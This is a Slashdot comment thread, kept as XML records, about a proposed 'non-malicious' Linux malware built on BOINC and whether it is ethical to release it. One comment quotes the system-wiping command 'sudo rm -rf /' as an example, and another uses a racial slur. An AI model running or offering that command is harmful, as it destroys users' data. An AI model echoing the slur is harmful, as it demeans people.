And also because viruses/malware are way less common on a *nix system because the people that write those sort of programs to steal identities, write them to steal from the masses, why bother writing a virus that \_might\_ effect a few ubuntu users when theres a shit ton of stupid windows users.
If your going to sneak attack for greed, attack a mass, not a cult operating system.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278842</id>
	<title>I would only release it</title>
	<author>Orion Blastar</author>
	<datestamp>1259597760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>to CERN or some other security group, or to White Hat Hackers who won't release it or use it, but study it and find a way around it.</p><p>I would pass it on to some Linux kernel and Linux OS developers, and see if they can fix the security holes you found that allow the hacking of Linux.</p><p>If you release it into the public for anyone to download, dollars to doughnuts some idiot is going to replace the Bonic client with a packet sniffer or key logger or something else. It is like inventing a rocket or missile and then someone takes it, steals your design, and then places a WMD in the warhead and launches them at public areas. Just like we wouldn't want technology leaked to Iran, Cuba, Syria, Sudan, North Korea, and other places that could use it for better missiles, guidence systems, encryption, etc some cyber terrorists would use your code to use it for espionage on some Linux web servers run by governments and the military because they thought Linux would be more secure than Windows.</p></htmltext>
<tokenext>to CERN or some other security group , or to White Hat Hackers who wo n't release it or use it , but study it and find a way around it.I would pass it on to some Linux kernel and Linux OS developers , and see if they can fix the security holes you found that allow the hacking of Linux.If you release it into the public for anyone to download , dollars to doughnuts some idiot is going to replace the Bonic client with a packet sniffer or key logger or something else .
It is like inventing a rocket or missile and then someone takes it , steals your design , and then places a WMD in the warhead and launches them at public areas .
Just like we would n't want technology leaked to Iran , Cuba , Syria , Sudan , North Korea , and other places that could use it for better missiles , guidence systems , encryption , etc some cyber terrorists would use your code to use it for espionage on some Linux web servers run by governments and the military because they thought Linux would be more secure than Windows .</tokentext>
<sentencetext>to CERN or some other security group, or to White Hat Hackers who won't release it or use it, but study it and find a way around it.I would pass it on to some Linux kernel and Linux OS developers, and see if they can fix the security holes you found that allow the hacking of Linux.If you release it into the public for anyone to download, dollars to doughnuts some idiot is going to replace the Bonic client with a packet sniffer or key logger or something else.
It is like inventing a rocket or missile and then someone takes it, steals your design, and then places a WMD in the warhead and launches them at public areas.
Just like we wouldn't want technology leaked to Iran, Cuba, Syria, Sudan, North Korea, and other places that could use it for better missiles, guidence systems, encryption, etc some cyber terrorists would use your code to use it for espionage on some Linux web servers run by governments and the military because they thought Linux would be more secure than Windows.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30290318</id>
	<title>Non-malicious Malware??</title>
	<author>thelonious</author>
	<datestamp>1259668380000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>1</modscore>
	<htmltext><p>Doesn't that just make it 'ware'?</p></htmltext>
<tokenext>Does n't that just make it 'ware ' ?</tokentext>
<sentencetext>Doesn't that just make it 'ware'?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283154</id>
	<title>Re:I think you've already decided...</title>
	<author>Anonymous</author>
	<datestamp>1259682780000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>This doesn't prove anything except that Windows losers desperately want some shadenfruede.</p></div><p>Yes, that is all this is about. Just those pesky Windows users wanting Linux to look bad. [ROLLS EYES].</p></div>
	</htmltext>
<tokenext>This does n't prove anything except that Windows losers desperately want some shadenfruede.Yes , that is all this is about .
Just those pesky Windows users wanting Linux to look bad .
[ ROLLS EYES ] .</tokentext>
<sentencetext>This doesn't prove anything except that Windows losers desperately want some shadenfruede.Yes, that is all this is about.
Just those pesky Windows users wanting Linux to look bad.
[ROLLS EYES].
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283140</id>
	<title>Re:I think you've already decided...</title>
	<author>jedidiah</author>
	<datestamp>1259682720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>&gt; Um, and this is different from a Windows virus how?</p><p>Microsoft has been hard at work blurring the line between data and executables for DECADES.</p><p>THAT is how a lame manual trojan on Unix is different from a Windows virus.</p><p>A Windows virus can perpetuate itself automatically with the holes that exist in Windows. This true even of the web based malware due to the notion that persists in Windows that you need to allow for the execution of random crud for the sake of convenience. This encourages end users to mindlessly run random crud and encourages website and other developers to shovel more of it towards the end users. They're buried in the crap and used to being buried in the crap.</p><p>word processor virus<br>database server virus<br>web browser virus</p><p>All of those are a reflection on Microsoft's approach to security engineering.</p><p>They also represent lessons that the rest of us should take to heart.</p></htmltext>
<tokenext>&gt; Um , and this is different from a Windows virus how ? Microsoft has been hard at work blurring the line between data and executables for DECADES.THAT is how a lame manual trojan on Unix is different from a Windows virus.A Windows virus can perpetuate itself automatically with the holes that exist in Windows .
This true even of the web based malware due to the notion that persists in Windows that you need to allow for the execution of random crud for the sake of convenience .
This encourages end users to mindlessly run random crud and encourages website and other developers to shovel more of it towards the end users .
They 're buried in the crap and used to being buried in the crap.word processor virusdatabase server virusweb browser virusAll of those are a reflection on Microsoft 's approach to security engineering.They also represent lessons that the rest of us should take to heart .</tokentext>
<sentencetext>&gt; Um, and this is different from a Windows virus how?Microsoft has been hard at work blurring the line between data and executables for DECADES.THAT is how a lame manual trojan on Unix is different from a Windows virus.A Windows virus can perpetuate itself automatically with the holes that exist in Windows.
This true even of the web based malware due to the notion that persists in Windows that you need to allow for the execution of random crud for the sake of convenience.
This encourages end users to mindlessly run random crud and encourages website and other developers to shovel more of it towards the end users.
They're buried in the crap and used to being buried in the crap.word processor virusdatabase server virusweb browser virusAll of those are a reflection on Microsoft's approach to security engineering.They also represent lessons that the rest of us should take to heart.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279870</id>
	<title>derp</title>
	<author>Anonymous</author>
	<datestamp>1259607660000</datestamp>
	<modclass>Troll</modclass>
	<modscore>-1</modscore>
	<htmltext>Y'all niggas are replying to a troll topic.</htmltext>
<tokenext>Y'all niggas are replying to a troll topic .</tokentext>
<sentencetext>Y'all niggas are replying to a troll topic.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30287906</id>
	<title>Re:Indeed Differences</title>
	<author>IshmaelDS</author>
	<datestamp>1259658180000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you</p></div><p><div class="quote"><p>Ok, could we please stop with this troll now ?</p><p>At one side of the range, Linux has ratter good market shares in the servers and scientific clusters domains.
At the other side of the range, Linux has achieved quasi-monopoly in the embed domain, specially on home routers, wireless access points, small NAS/SAN, no-brand multimedia player/harddisk-enclosures, etc.</p><p>That's a lot of Linux running machines. The later are always connected to network, the former have even access to high-speed connections. This should make them more desirable to be infected isn't it ? Yet, there has not been an outbreak similar to Code Red on Linux. Simply because the default security settings, and the heterogeneity of distributions making it a hard to read moving target.</p><p>There are a lot of reasons while blackhats would be interested in attacking Linux, but despite this Windows is still the low-hanging fruit.</p></div><p>Okay I agree with you in principle, there are a lot of *nix devices out there, but the ones you are highlighting are the ones that are most likely to not get infected no matter what OS they are running.  The server/scientific clusters are going to be run by knowledgeable people that are able to secure their servers.  The embedded devices are generally built to only accept software by either the device maker (i.e. home router firmware) or built specifically for them and vetted by a either the device creator (i.e. Iphone) or less then likely to be installed by any average user (i.e. putting Linux on a home router) The kind of person that is going to get malware on their *nix box is the same kind of person that get's their windows machines infected.  They click okay on anything/everything and (for instance) the ubuntu security box that pop's up and asks for a password is going to be no more of a deterrent then the vista/win7 security box is going to be.  The problem with it as well is that as distrib's like Ubuntu try to get more of the market share of the average user they will make a few more concessions and the number of "tips" that tell people to run apt-get and download this, run this etc will increase and it will be that much easier to have people that don't know better installing malware.</p></div>
	</htmltext>
<tokenext>The only " protection " that * nix/mac systems have over Windows is that no one gives a rats ass about infecting youOk , could we please stop with this troll now ? At one side of the range , Linux has ratter good market shares in the servers and scientific clusters domains .
At the other side of the range , Linux has achieved quasi-monopoly in the embed domain , specially on home routers , wireless access points , small NAS/SAN , no-brand multimedia player/harddisk-enclosures , etc.That 's a lot of Linux running machines .
The later are always connected to network , the former have even access to high-speed connections .
This should make them more desirable to be infected is n't it ?
Yet , there has not been an outbreak similar to Code Red on Linux .
Simply because the default security settings , and the heterogeneity of distributions making it a hard to read moving target.There are a lot of reasons while blackhats would be interested in attacking Linux , but despite this Windows is still the low-hanging fruit.Okay I agree with you in principle , there are a lot of * nix devices out there , but the ones you are highlighting are the ones that are most likely to not get infected no matter what OS they are running .
The server/scientific clusters are going to be run by knowledgeable people that are able to secure their servers .
The embedded devices are generally built to only accept software by either the device maker ( i.e .
home router firmware ) or built specifically for them and vetted by a either the device creator ( i.e .
Iphone ) or less then likely to be installed by any average user ( i.e .
putting Linux on a home router ) The kind of person that is going to get malware on their * nix box is the same kind of person that get 's their windows machines infected .
They click okay on anything/everything and ( for instance ) the ubuntu security box that pop 's up and asks for a password is going to be no more of a deterrent then the vista/win7 security box is going to be .
The problem with it as well is that as distrib 's like Ubuntu try to get more of the market share of the average user they will make a few more concessions and the number of " tips " that tell people to run apt-get and download this , run this etc will increase and it will be that much easier to have people that do n't know better installing malware .</tokentext>
<sentencetext>The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting youOk, could we please stop with this troll now ?At one side of the range, Linux has ratter good market shares in the servers and scientific clusters domains.
At the other side of the range, Linux has achieved quasi-monopoly in the embed domain, specially on home routers, wireless access points, small NAS/SAN, no-brand multimedia player/harddisk-enclosures, etc.That's a lot of Linux running machines.
The later are always connected to network, the former have even access to high-speed connections.
This should make them more desirable to be infected isn't it ?
Yet, there has not been an outbreak similar to Code Red on Linux.
Simply because the default security settings, and the heterogeneity of distributions making it a hard to read moving target.There are a lot of reasons while blackhats would be interested in attacking Linux, but despite this Windows is still the low-hanging fruit.Okay I agree with you in principle, there are a lot of *nix devices out there, but the ones you are highlighting are the ones that are most likely to not get infected no matter what OS they are running.
The server/scientific clusters are going to be run by knowledgeable people that are able to secure their servers.
The embedded devices are generally built to only accept software by either the device maker (i.e.
home router firmware) or built specifically for them and vetted by a either the device creator (i.e.
Iphone) or less then likely to be installed by any average user (i.e.
putting Linux on a home router) The kind of person that is going to get malware on their *nix box is the same kind of person that get's their windows machines infected.
They click okay on anything/everything and (for instance) the ubuntu security box that pop's up and asks for a password is going to be no more of a deterrent then the vista/win7 security box is going to be.
The problem with it as well is that as distrib's like Ubuntu try to get more of the market share of the average user they will make a few more concessions and the number of "tips" that tell people to run apt-get and download this, run this etc will increase and it will be that much easier to have people that don't know better installing malware.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279914</id>
	<title>Re:It does harm!!!!</title>
	<author>kdemetter</author>
	<datestamp>1259608080000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p>It could do more damage :</p><p>Boinc is build on voluntary use , meaning a group of people who voluntarily join , making their tiny cpu cycles contribute to a greater goal.<br>This malware would force someone to join , which is a bit like forcing someone to do charity work : it's commendable , but only if you really want to do it , otherwise it's abuse .</p><p>If you had boinc mysteriously appear on your pc , i'm sure you will remove it , and many who would have met boinc in better circumstances , would now never install it anymore.</p></htmltext>
<tokenext>It could do more damage : Boinc is build on voluntary use , meaning a group of people who voluntarily join , making their tiny cpu cycles contribute to a greater goal.This malware would force someone to join , which is a bit like forcing someone to do charity work : it 's commendable , but only if you really want to do it , otherwise it 's abuse .If you had boinc mysteriously appear on your pc , i 'm sure you will remove it , and many who would have met boinc in better circumstances , would now never install it anymore .</tokentext>
<sentencetext>It could do more damage :Boinc is build on voluntary use , meaning a group of people who voluntarily join , making their tiny cpu cycles contribute to a greater goal.This malware would force someone to join , which is a bit like forcing someone to do charity work : it's commendable , but only if you really want to do it , otherwise it's abuse .If you had boinc mysteriously appear on your pc , i'm sure you will remove it , and many who would have met boinc in better circumstances , would now never install it anymore.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278866</id>
	<title>Some security threat...</title>
	<author>Anonymous</author>
	<datestamp>1259597940000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>FTFS: "The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads"</p><p>how is that different than posting a script with "sudo rm -rf<nobr> <wbr></nobr>/" and asking people to download and execute it?</p><p>I was a windows user for almost ten years. i never used an antivirus or antimalware porgram, and i never had any security problems. 99.9\% of security issues are problems between keyboard and chair.</p></htmltext>
<tokenext>FTFS : " The malware does not exploit any security holes , only loose security configurations and mindless execution of unverified downloads " how is that different than posting a script with " sudo rm -rf / " and asking people to download and execute it ? I was a windows user for almost ten years .
i never used an antivirus or antimalware porgram , and i never had any security problems .
99.9 \ % of security issues are problems between keyboard and chair .</tokentext>
<sentencetext>FTFS: "The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads"how is that different than posting a script with "sudo rm -rf /" and asking people to download and execute it?I was a windows user for almost ten years.
i never used an antivirus or antimalware porgram, and i never had any security problems.
99.9\% of security issues are problems between keyboard and chair.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279414</id>
	<title>Try seeing the definition of malware...</title>
	<author>Anonymous</author>
	<datestamp>1259603100000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Malware == malicious.  Doofus.</p></htmltext>
<tokenext>Malware = = malicious .
Doofus .</tokentext>
<sentencetext>Malware == malicious.
Doofus.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282460</id>
	<title>Contradiction in Terms</title>
	<author>Anonymous</author>
	<datestamp>1259679120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>Since the mal in mal-ware stands for malicious, it is logically impossible to release non-malicious malware.</htmltext>
<tokenext>Since the mal in mal-ware stands for malicious , it is logically impossible to release non-malicious malware .</tokentext>
<sentencetext>Since the mal in mal-ware stands for malicious, it is logically impossible to release non-malicious malware.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280900</id>
	<title>Tell the BOINC developers...</title>
	<author>c0lo</author>
	<datestamp>1259663460000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>... if their product can be used as a gateway for malware to enter the system running it.
They should at least write a "How to install/run BOINC without being screwed", if not extend of connection protocol to force a "BOINC tasks distribution server" to authenticate in a special mode (while deprecating the prev protocol allowing a poser to trick the user into downloading "jobs" from them).</htmltext>
<tokenext>... if their product can be used as a gateway for malware to enter the system running it .
They should at least write a " How to install/run BOINC without being screwed " , if not extend of connection protocol to force a " BOINC tasks distribution server " to authenticate in a special mode ( while deprecating the prev protocol allowing a poser to trick the user into downloading " jobs " from them ) .</tokentext>
<sentencetext>... if their product can be used as a gateway for malware to enter the system running it.
They should at least write a "How to install/run BOINC without being screwed", if not extend of connection protocol to force a "BOINC tasks distribution server" to authenticate in a special mode (while deprecating the prev protocol allowing a poser to trick the user into downloading "jobs" from them).</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279880</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>Anonymous</author>
	<datestamp>1259607840000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I'm curious which parts of the Windows or Mac OS X security policy you can't control. Unless your suggesting that Microsoft or Apple have some sort of hidden backdoors in their operating systems, which seems pretty ludicrous in this day and age.</p><p>And your thing about the updater... You can indeed configure both Windows and Mac OS X to only notify you when there are updates.</p></htmltext>
<tokenext>I 'm curious which parts of the Windows or Mac OS X security policy you ca n't control .
Unless your suggesting that Microsoft or Apple have some sort of hidden backdoors in their operating systems , which seems pretty ludicrous in this day and age.And your thing about the updater... You can indeed configure both Windows and Mac OS X to only notify you when there are updates .</tokentext>
<sentencetext>I'm curious which parts of the Windows or Mac OS X security policy you can't control.
Unless your suggesting that Microsoft or Apple have some sort of hidden backdoors in their operating systems, which seems pretty ludicrous in this day and age.And your thing about the updater... You can indeed configure both Windows and Mac OS X to only notify you when there are updates.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281990</id>
	<title>Re:Ethics</title>
	<author>PouletFou</author>
	<datestamp>1259675400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I had the same problem! Spent hours of googling only to find out that I had to buy some paper. Linux is so not ready for the desktop.</htmltext>
<tokenext>I had the same problem !
Spent hours of googling only to find out that I had to buy some paper .
Linux is so not ready for the desktop .</tokentext>
<sentencetext>I had the same problem!
Spent hours of googling only to find out that I had to buy some paper.
Linux is so not ready for the desktop.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278582</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278806</id>
	<title>Just include the source and you'll be OK !! TRUST</title>
	<author>Anonymous</author>
	<datestamp>1259597580000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>ME !! I will do what's right.  Muhahahahahhahahah !!</p></htmltext>
<tokenext>ME ! !
I will do what 's right .
Muhahahahahhahahah !
!</tokentext>
<sentencetext>ME !!
I will do what's right.
Muhahahahahhahahah !
!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30288100</id>
	<title>You work  for Who?</title>
	<author>Anonymous</author>
	<datestamp>1259658900000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>And you have nothing better to do then break things and show other how to make a mess.</p></htmltext>
<tokenext>And you have nothing better to do then break things and show other how to make a mess .</tokentext>
<sentencetext>And you have nothing better to do then break things and show other how to make a mess.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278628</id>
	<title>SELinux on a a server?</title>
	<author>bsDaemon</author>
	<datestamp>1259596140000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Wasn't SELinux implicated in part of making the mmap\_min\_addr root exploit even worse a few months ago?  In fact, for one of them, I'm pretty sure that it was the cause of it.  Just sayin'.</htmltext>
<tokenext>Was n't SELinux implicated in part of making the mmap \ _min \ _addr root exploit even worse a few months ago ?
In fact , for one of them , I 'm pretty sure that it was the cause of it .
Just sayin' .</tokentext>
<sentencetext>Wasn't SELinux implicated in part of making the mmap\_min\_addr root exploit even worse a few months ago?
In fact, for one of them, I'm pretty sure that it was the cause of it.
Just sayin'.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30293962</id>
	<title>Talk to The NSA</title>
	<author>Anonymous</author>
	<datestamp>1259692680000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>If you've got a good package, present it to the NSA.  They'll DEFINITELY want to hear about it.  Possibly a consultancy.</p></htmltext>
<tokenext>If you 've got a good package , present it to the NSA .
They 'll DEFINITELY want to hear about it .
Possibly a consultancy .</tokentext>
<sentencetext>If you've got a good package, present it to the NSA.
They'll DEFINITELY want to hear about it.
Possibly a consultancy.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283540</id>
	<title>stupid article</title>
	<author>Anonymous</author>
	<datestamp>1259684400000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Linux being made insecure by stupid users. What a shock. Do you really think your code will do anything previous code as not done? truly? Release it already. My systems won't be affected, nor will the majority of Linux users. I say let the noobs get infected by lame code, they will learn from it.</p></htmltext>
<tokenext>Linux being made insecure by stupid users .
What a shock .
Do you really think your code will do anything previous code as not done ?
truly ? Release it already .
My systems wo n't be affected , nor will the majority of Linux users .
I say let the noobs get infected by lame code , they will learn from it .</tokentext>
<sentencetext>Linux being made insecure by stupid users.
What a shock.
Do you really think your code will do anything previous code as not done?
truly? Release it already.
My systems won't be affected, nor will the majority of Linux users.
I say let the noobs get infected by lame code, they will learn from it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279054</id>
	<title>Heck, just do it.</title>
	<author>gzipped\_tar</author>
	<datestamp>1259599620000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>We Linux geeks won't censor you or sue you or something. We're not MS.</p><p>It's not a hazard. It's a benefit. We understand.</p></htmltext>
<tokenext>We Linux geeks wo n't censor you or sue you or something .
We 're not MS.It 's not a hazard .
It 's a benefit .
We understand .</tokentext>
<sentencetext>We Linux geeks won't censor you or sue you or something.
We're not MS.It's not a hazard.
It's a benefit.
We understand.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282326</id>
	<title>why waste your time on this?</title>
	<author>Uzik2</author>
	<datestamp>1259678400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>There isn't something all white you could be doing instead? Priorities man! Priorities.</p></htmltext>
<tokenext>There is n't something all white you could be doing instead ?
Priorities man !
Priorities .</tokentext>
<sentencetext>There isn't something all white you could be doing instead?
Priorities man!
Priorities.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30286364</id>
	<title>Research paper</title>
	<author>narooze</author>
	<datestamp>1259696040000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>Why should this be any different from what research scientists do all the time (with actual security holes to boot)? Just write up a research paper (or a blog post or whatever) and describe the problem and give some thoughts to possible solutions (user not being mindless idiots anymore) and release it. There is definitely nothing ethically wrong with it in my book (and there shouldn't be in anyone else's either).</p></htmltext>
<tokenext>Why should this be any different from what research scientists do all the time ( with actual security holes to boot ) ?
Just write up a research paper ( or a blog post or whatever ) and describe the problem and give some thoughts to possible solutions ( user not being mindless idiots anymore ) and release it .
There is definitely nothing ethically wrong with it in my book ( and there should n't be in anyone else 's either ) .</tokentext>
<sentencetext>Why should this be any different from what research scientists do all the time (with actual security holes to boot)?
Just write up a research paper (or a blog post or whatever) and describe the problem and give some thoughts to possible solutions (user not being mindless idiots anymore) and release it.
There is definitely nothing ethically wrong with it in my book (and there shouldn't be in anyone else's either).</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278638</id>
	<title>I can't hear you!</title>
	<author>Anonymous</author>
	<datestamp>1259596140000</datestamp>
	<modclass>Funny</modclass>
	<modscore>1</modscore>
	<htmltext><p>{fingers in ears}  La la la la la la la la la la la la la.......</p></htmltext>
<tokenext>{ fingers in ears } La la la la la la la la la la la la la...... .</tokentext>
<sentencetext>{fingers in ears}  La la la la la la la la la la la la la.......</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281784</id>
	<title>demonstration of Linux 'malware'</title>
	<author>viralMeme</author>
	<datestamp>1259673300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>"<i>a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects</i>"<br> <br>

Can you provide a link to a demonstration of this Linux 'malware'. One that - with no user action - can compromise my machine or by clicking on even a version of 'malware' that works by clicking on a URL or opening an email attachment.<br> <br>

As far as I can make out, users must first download and install BOINC and allow RPC calls. I mean if that's your definition of malware so is me putting a safe in the middle of the street with the combination numbers taped to it. No doubt you would then write a story about just how easy it is to crack that particualr model of safe.<br> <br>

<i>kdawson, have you nothing else to write about ???</i></htmltext>
<tokenext>" a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects " Can you provide a link to a demonstration of this Linux 'malware' .
One that - with no user action - can compromise my machine or by clicking on even a version of 'malware ' that works by clicking on a URL or opening an email attachment .
As far as I can make out , users must first download and install BOINC and allow RPC calls .
I mean if that 's your definition of malware so is me putting a safe in the middle of the street with the combination numbers taped to it .
No doubt you would then write a story about just how easy it is to crack that particualr model of safe .
kdawson , have you nothing else to write about ? ?
?</tokentext>
<sentencetext>"a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects" 

Can you provide a link to a demonstration of this Linux 'malware'.
One that - with no user action - can compromise my machine or by clicking on even a version of 'malware' that works by clicking on a URL or opening an email attachment.
As far as I can make out, users must first download and install BOINC and allow RPC calls.
I mean if that's your definition of malware so is me putting a safe in the middle of the street with the combination numbers taped to it.
No doubt you would then write a story about just how easy it is to crack that particualr model of safe.
kdawson, have you nothing else to write about ??
?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282652</id>
	<title>What does this prove?</title>
	<author>Anonymous</author>
	<datestamp>1259680140000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I really don't understand what the OP is trying to prove.  That running a program as a regular user on will allow that program to have that users priviledges???  Is this meant to be some sort of revelation?</p><p>Note to self, purposely installing malware is not a good idea.</p><p>OP:  I'm affraid you have wasted alot of time and proved nothing with this experiment.</p></htmltext>
<tokenext>I really do n't understand what the OP is trying to prove .
That running a program as a regular user on will allow that program to have that users priviledges ? ? ?
Is this meant to be some sort of revelation ? Note to self , purposely installing malware is not a good idea.OP : I 'm affraid you have wasted alot of time and proved nothing with this experiment .</tokentext>
<sentencetext>I really don't understand what the OP is trying to prove.
That running a program as a regular user on will allow that program to have that users priviledges???
Is this meant to be some sort of revelation?Note to self, purposely installing malware is not a good idea.OP:  I'm affraid you have wasted alot of time and proved nothing with this experiment.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281360</id>
	<title>Re:I think you've already decided...</title>
	<author>nstlgc</author>
	<datestamp>1259668500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I think you meant to say "schadenfreude". Relax, cowboy!</htmltext>
<tokenext>I think you meant to say " schadenfreude " .
Relax , cowboy !</tokentext>
<sentencetext>I think you meant to say "schadenfreude".
Relax, cowboy!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281182</id>
	<title>Re:I think you've already decided...</title>
	<author>Anonymous</author>
	<datestamp>1259666100000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>@jedidiah</p><p><div class="quote"><p> shadenfruede.</p></div><p>Almost. Schadenfreude. And the capital S is according to German grammar, too.</p><p>Just nitpicking.</p></div>
	</htmltext>
<tokenext>@ jedidiah shadenfruede.Almost .
Schadenfreude. And the capital S is according to German grammar , too.Just nitpicking .</tokentext>
<sentencetext>@jedidiah shadenfruede.Almost.
Schadenfreude. And the capital S is according to German grammar, too.Just nitpicking.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291502</id>
	<title>Re:I think you've already decided...</title>
	<author>BikeHelmet</author>
	<datestamp>1259674020000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>This doesn't prove anything except that Windows losers desperately want some shadenfruede</p></div><p>I've gotten pwned by legit updates more on Linux than on Windows.</p><p>That's bad. Microsoft has a poor track record. Beating it is awful, though understandable. (You can't test stuff on every piece of hardware in existence)</p><p>I haven't had a virus or trojan in about 7 years, so I think I'm finally knowledgeable enough to run Windows safely. This thing however would pwn me, because I don't have as much linux knowledge.<nobr> <wbr></nobr>;)</p><p>He should definitely release it. Linux is spreading - if you let admins get a false sense of security, they'll get pwned, and Linux will gain the same rep as Windows.</p></div>
	</htmltext>
<tokenext>This does n't prove anything except that Windows losers desperately want some shadenfruedeI 've gotten pwned by legit updates more on Linux than on Windows.That 's bad .
Microsoft has a poor track record .
Beating it is awful , though understandable .
( You ca n't test stuff on every piece of hardware in existence ) I have n't had a virus or trojan in about 7 years , so I think I 'm finally knowledgeable enough to run Windows safely .
This thing however would pwn me , because I do n't have as much linux knowledge .
; ) He should definitely release it .
Linux is spreading - if you let admins get a false sense of security , they 'll get pwned , and Linux will gain the same rep as Windows .</tokentext>
